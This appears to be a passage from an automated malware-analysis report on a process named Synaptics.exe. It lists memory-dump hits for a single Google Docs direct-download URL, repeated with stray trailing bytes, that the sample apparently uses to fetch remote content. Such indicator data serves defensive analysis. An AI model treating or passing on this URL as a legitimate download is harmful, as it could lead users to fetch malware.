                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ.
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ:
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJRT
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJj
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJt
                          Source: Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                          Source: Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKH
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKO
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL-
                          Source: Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLName8.
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLZDGU
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                          Source: Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMs
                          Source: Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN;
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadName
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOGOUT
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOt7
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP.
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQO
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR-
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR;
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E73E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS)
                          Source: Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSI
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSan
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadServev
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSl
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTB
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTE
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadThe
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUS
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUb
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUs
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV(
                          Source: Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV-
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVB
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVCPS.
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVa
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWN
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWh
                          Source: Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWsu
                          Source: Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWt(
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX)
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ5
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZDGUK
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_f
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada-arc
                          Source: Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada=259
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadackgr
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadads
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadancis
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadancis6KL
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadatche
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadatm#
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadax-ag
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E73E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb5
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbL
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbYTpp
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadce
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadceKw;
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadceOs7
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcell
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelle
                          Source: Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelle0/
